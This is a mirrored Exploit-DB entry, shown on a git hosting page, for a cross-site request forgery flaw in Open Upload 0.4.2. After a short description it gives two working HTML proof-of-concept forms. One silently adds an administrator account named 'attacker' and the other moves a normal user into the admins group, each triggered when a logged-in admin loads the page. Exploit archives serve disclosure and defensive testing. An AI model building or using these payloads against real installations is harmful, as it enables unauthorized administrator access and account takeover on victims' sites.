bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/40193.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

65 lines
No EOL
3.1 KiB
Text
Raw Blame History

================================================================================================================
Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission
================================================================================================================
# Exploit Title : Open Upload 0.4.2 Remote Admin Add CSRF Exploit
# Exploit Author : Vinesh Redkar (@b0rn2pwn)
# Email : vineshredkar89[at]gmail[d0t]com
# Date: 21/07/2016
# Vendor Homepage: http://openupload.sourceforge.net/
# Software Link: https://sourceforge.net/projects/openupload/
# Version: 0.4.2
# Tested on: Windows 10 OS
Open Upload Application is vulnerable to CSRF attack (No CSRF token in place) meaning
that if an admin user can be tricked to visit a crafted URL created by
attacker (via spear phishing/social engineering).
Once exploited, the attacker can login as the admin using the username and the password he posted in the form.
======================CSRF POC (Adding New user with Admin Privileges)==================================
CSRF PoC Code
<html>
<head>
<title>Remote Admin Add CSRF Exploit</title>
</head>
<H2>Remote Admin Add CSRF Exploit by b0rn2pwn</H2>
<body>
<form action="http://127.0.0.1/openupload/index.php" method="POST">
<input type="hidden" name="action" value="adminusers" />
<input type="hidden" name="step" value="2" />
<input type="hidden" name="adduserlogin" value="attacker" />
<input type="hidden" name="adduserpassword" value="attacker" />
<input type="hidden" name="adduserrepassword" value="attacker" />
<input type="hidden" name="addusername" value="attacker" />
<input type="hidden" name="adduseremail" value="attacker&#64;gmail&#46;com" />
<input type="hidden" name="addusergroup" value="admins" />
<input type="hidden" name="adduserlang" value="en" />
<input type="hidden" name="adduseractive" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
======================CSRF POC (Changing privileges from normal user to administer)==================================
<html>
<head>
<title>Change privilege normal user to administer CSRF Exploit</title>
</head>
<H2>Change privilege normal user to administer CSRF Exploit by b0rn2pwn</H2>
<body>
<form action="http://127.0.0.1/openupload/index.php" method="POST">
<input type="hidden" name="action" value="adminusers" />
<input type="hidden" name="step" value="3" />
<input type="hidden" name="login" value="normal user" />
<input type="hidden" name="edituserpassword" value="" />
<input type="hidden" name="edituserrepassword" value="" />
<input type="hidden" name="editusername" value="normaluser" />
<input type="hidden" name="edituseremail" value="normaluser&#64;gmail&#46;com" />
<input type="hidden" name="editusergroup" value="admins" />
<input type="hidden" name="edituserlang" value="en" />
<input type="hidden" name="edituseractive" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink